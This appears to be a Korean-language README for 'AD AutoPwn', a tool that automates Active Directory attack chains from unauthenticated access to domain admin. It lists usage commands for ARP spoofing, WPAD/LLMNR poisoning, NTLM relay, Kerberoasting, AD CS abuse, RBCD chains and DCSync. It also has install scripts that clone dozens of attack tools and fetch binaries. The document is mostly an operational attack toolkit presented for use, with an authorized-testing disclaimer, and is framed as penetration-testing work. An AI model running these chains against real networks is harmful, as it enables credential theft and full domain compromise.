
AD AutoPwn v4.10.0 — 자동화된 AD 공격 체인, 제로 인증에서 도메인 관리자까지. Discover/Kerberoast/AS-REP/AD CS ESC1-16/Shadow Creds/RBCD+KCD/Ghost-SPN/TGS-rewrite/Dollar-Ticket/WPAD/WSUS/PXE/SCCM/BloodHound auto-action/Loot/DCSync/DPAPI + Synacktiv 2026 reflection (CVE-2025-58726/2026-24294/2026-26128). 승인된 침투 테스트 전용.
제로 인증에서 도메인 관리자까지 — 자동화된 Active Directory 공격 체인
25개 이상의 공격 기법을 연결하여 Active Directory 환경을 손상시키는 완전 자동화된 침투 테스트 도구입니다. 승인된 보안 평가용으로 설계되었습니다.
_ ___ _ _ ___
/_\ | \ /_\ _ _| |_ ___| _ \__ __ ___ _
/ _ \| |) | / _ \ || | _/ _ \ _/\ V V / ' \
/_/ \_\___/ /_/ \_\_,_|\__\___/_| \_/\_/|_||_|
⚡ 제로 인증에서 도메인 관리자까지 — 공격 체인
발견 | 스니핑 | ARP | WPAD | WSUS | PXE | AD CS | SCCM | 로스트
BloodHound | 리플렉트 | 루트 | RBCD+KCD | DCSync | DPAPI
DONT_REQ_PREAUTH가 설정된 경우 무료 해시)--spray-password로 선택적 활성화).library-ms / .theme / .url 파일bloodhound-python -c All 수집 + ZIP 분석WriteSPN, AddKeyCredentialLink, GenericAll/Write, WriteDacl/Owner, WriteAccountRestrictions, AddAllowedToAct, ForceChangePasswordWriteSPN → ghost-SPN 업그레이드 (CVE-2025-58726)AddKeyCredentialLink → 섀도 자격 증명 → PKINIT → NT 해시Computer에 대한 GenericAll / WriteAccountRestrictions → RBCD 체인 → 관리자 TGS-altservice 재작성, 한 단계로-altservice를 통한 인라인$ 접미사 재시도 → 자동 생성된 <user>$ 시스템 계정을 통한 Linux 사용자용 TGT → GSSAPI SSHnxc -x를 통한 Get-CimInstance Win32_Process; mysql/sqlcmd/runas/KeePass/--password 스타일 플래그의 비밀번호 정규식 grepC:\Users에서 *.kdbx 찾기, smbclient로 다운로드, keepass2john | hashcat -m 13400# 완전 자동화 — 제로 자격 증명 체인 (모든 것을 자동 발견)
sudo ./ad-autopwn.py
# 자격 증명 포함 — 전체 체인
./ad-autopwn.py -u jsmith -p 'P@ss123' -d corp.local --dc-ip 10.0.0.1
# AWS / VPC 랩 (레이어 2 공격 차단됨) — 자동 발견은 여전히 작동
sudo ./ad-autopwn.py --no-arp --no-wpad
# 사전 인증 자격 증명 발견 (잠금 방지)
sudo ./ad-autopwn.py --phase discover --no-arp --no-wpad
# BloodHound 그래프 수집 + 자동 고가치 분석
./ad-autopwn.py --phase bloodhound -u user -p pass -d corp.local \
--dc-ip 10.0.0.1 --dc-fqdn dc01.corp.local
# 달러 티켓 — 자동 생성된 root$ 시스템 계정을 통한 'root'용 TGT
./ad-autopwn.py -u user -p pass -d corp.local --dc-ip 10.0.0.1 \
--phase dollar-ticket --target-user root
# RBCD+KCD 체인 — 전체 ghost-SPN + RBCD + altservice 재작성, 한 번에
./ad-autopwn.py -u user -p pass -d corp.local --dc-ip 10.0.0.1 \
--phase rbcd-kcd -T VHAGAR$ --alt-spn HTTP/vhagar.corp.local
# AppLocker 우회
./ad-autopwn.py -u user -p pass --applocker --lolbin mshta --custom-cmd "whoami"
# 드라이 런 (모든 명령 출력, 실행하지 않음 — 백그라운드 프로세스 포함)
./ad-autopwn.py --dry-run -u user -p pass -d corp.local --dc-ip 10.0.0.1
apt install python3 impacket-scripts netexec nmap hashcat tcpdump \
responder dsniff arp-scan certipy-ad bloodyad bloodhound.py \
smbclient atftp wimtools john seclists
/opt/tools/에 클론)git clone https://github.com/mverschu/CVE-2025-33073 /opt/tools/CVE-2025-33073
git clone https://github.com/dirkjanm/krbrelayx /opt/tools/krbrelayx
git clone https://github.com/Wh04m1001/DFSCoerce /opt/tools/DFSCoerce
git clone https://github.com/ShutdownRepo/ShadowCoerce /opt/tools/ShadowCoerce
git clone https://github.com/ShutdownRepo/pywhisker /opt/tools/pywhisker
git clone https://github.com/dirkjanm/PKINITtools /opt/tools/PKINITtools
git clone https://github.com/csandker/pxethiefy /opt/tools/pxethiefy
git clone https://github.com/garrettfoster13/sccmhunter /opt/tools/sccmhunter
git clone https://github.com/dirkjanm/mitm6 /opt/tools/mitm6
git clone https://github.com/Hackndo/pyGPOAbuse /opt/tools/pyGPOAbuse
git clone https://github.com/Hackndo/WebclientServiceScanner /opt/tools/WebclientServiceScanner
git clone https://github.com/almandin/Certihound /opt/tools/Certihound
pipx install coercer
pipx install wsuks --system-site-packages
kerbrute — 최신 바이너리를
https://github.com/ropnop/kerbrute/releases 에서 받아 /usr/local/bin/에 설치userenum-cldap — 동반 CLDAP NetLogon-핑 열거기 (이 저장소에
userenum-cldap.py로 포함됨; /usr/local/bin/userenum-cldap에 설치)asn1tools — pip install asn1tools (CLDAP 열거 런타임 종속성)# APT 패키지
sudo apt install python3 impacket-scripts netexec nmap hashcat tcpdump \
responder dsniff arp-scan certipy-ad bloodyad bloodhound.py \
smbclient atftp wimtools john seclists
# 모든 필요한 저장소
for repo in mverschu/CVE-2025-33073 dirkjanm/krbrelayx \
Wh04m1001/DFSCoerce ShutdownRepo/ShadowCoerce \
ShutdownRepo/pywhisker dirkjanm/PKINITtools \
csandker/pxethiefy garrettfoster13/sccmhunter \
dirkjanm/mitm6 Hackndo/pyGPOAbuse \
Hackndo/WebclientServiceScanner almandin/Certihound; do
sudo git clone "https://github.com/$repo" "/opt/tools/$(basename $repo)"
done
# 필요한 Python 종속성이 있는 저장소
for repo in pywhisker PKINITtools sccmhunter pxethiefy mitm6 pyGPOAbuse Certihound; do
[ -f "/opt/tools/$repo/requirements.txt" ] && \
pip3 install --break-system-packages -r "/opt/tools/$repo/requirements.txt"
done
# Pipx 패키지
pipx install coercer
pipx install wsuks --system-site-packages
# kerbrute (ropnop) 바이너리
sudo wget -q -O /usr/local/bin/kerbrute \
https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
sudo chmod +x /usr/local/bin/kerbrute
# CLDAP userenum 런타임 종속성
sudo pip3 install --break-system-packages asn1tools
# userenum-cldap 동반 스크립트 (이 저장소)
sudo wget -q -O /usr/local/bin/userenum-cldap \
https://raw.githubusercontent.com/jonaslejon/ad-autopwn/main/userenum-cldap.py
sudo chmod +x /usr/local/bin/userenum-cldap
# ad-autopwn 자체
sudo cp ad-autopwn.py /usr/local/bin/ad-autopwn
sudo chmod +x /usr/local/bin/ad-autopwn
check_prerequisites()는 모든 실행 시작 시에 실행되며, 스크립트가 사용하는 각 도구에 대해 초록색 ✅ / 노란색 ⚠️ 상태를 출력하고 누락된 부분에 대한 설치 힌트를 제공합니다.
eu-west-1 — 전체 v4.10.0 단계 적용 범위가 종단간 검증됨.
AWS에서 자동 발견은 이제 --no-arp --no-wpad만으로 작동합니다. (나머지 모든 것—인터페이스, 공격자 IP, 도메인, DC IP, DC FQDN—은 서브넷 스윕 + @<dc_ip>를 사용한 dig 대체로 자동 감지됩니다.)stannis.baratheon → GenericAll → KINGSLANDING$ 엣지에서 입증되었습니다: 단일 저권한 자격 증명에서 DC의 관리자 TGS까지 5초 이내.krbtgt를 포함한 20개의 자격 증명을 추출했습니다 — 골든 티켓 가능.--dry-run은 모든 명령(포그라운드 및 백그라운드)을 실행하지 않고 출력합니다 — ARP 스푸퍼, mitm6, Responder 또는 ntlmrelayx를 생성하지 않습니다.try/finally와 os.chdir로 래핑되어 어떤 종료 경로에서도 복원이 올바른 디렉토리에 이루어지도록 보장합니다.--no-cleanup은 모든 것을 포렌식 검토를 위해 유지합니다.승인된 침투 테스트 및 보안 연구용입니다.
이 도구는 승인된 작업 중 보안 전문가가 사용하도록 설계되었습니다. 컴퓨터 시스템에 대한 무단 접근은 불법입니다. 테스트 전에 항상 서면 허가를 받으십시오.
Triop AB — https://triop.se
MIT
| 단계 | 인증 | 설명 |
|---|
full | 선택 사항 | 완전 자동화 체인 (자격 증명 유무 자동 감지) |
sniff | 없음 | 수동적 L2 트래픽 발견 |
discover | 없음 | kerbrute + CLDAP + AS-REP + pre2k + (선택적) 스프레이 |
arp | 없음 | ARP 스푸핑 + NTLM 캡처 |
wpad | 없음 | WPAD/LLMNR 중독 (mitm6 / Responder) |
wsus | 없음 | WSUS NTLM 릴레이 |
pxe | 없음 | PXE 부트 자격 증명 도용 |
enum | 필요 | 대상 열거 (릴레이 대상, 무제한 위임, WebClient 호스트) |
enrich | 필요 | nxc 13개 모듈 배터리 (LAPS, timeroast, MAQ, nopac, zerologon, …) + 자동 소비자 |
bloodhound | 필요 | bloodhound-python -c All + 분석 + 자동 실행 체인 |
roast | 필요 | Kerberoast + AS-REP Roast |
adcs | 필요 | AD CS 익스플로잇 (ESC1-ESC16) |
sccm | 필요 | SCCM NAA 자격 증명 도용 |
exploit | 필요 | 특정 대상에 NTLM 반사/강제 익스플로잇 |
dcsync | 필요 (DA) | 도메인 해시 덤프 |
loot | 필요 | 프로세스 명령줄 수집 + KeePass 발견/크래킹 |
tgs-rewrite | 없음 | 오프라인 ccache sname 재작성 (tgssub 스타일 KCD 우회) |
dollar-ticket | 필요 | KDC $ 접미사 재시도 공격 (Linux GSSAPI 대상) |
rbcd-kcd | 필요 | 전체 RBCD+KCD 체인 오케스트레이터 (WriteSPN → ghost → RBCD → S4U+altservice) |
reflect-tcpport | 필요 | CVE-2026-24294 LPE 프리미티브 (tcpport를 통한 SMB) |
reflect-loopback | 필요 | CVE-2026-26128 LPE 프리미티브 (유니코드 SPN을 통한 Kerberos 루프백) |
kerb-reflect | 필요 | CVE-2025-58726 ghost-SPN AP-REQ 반사 |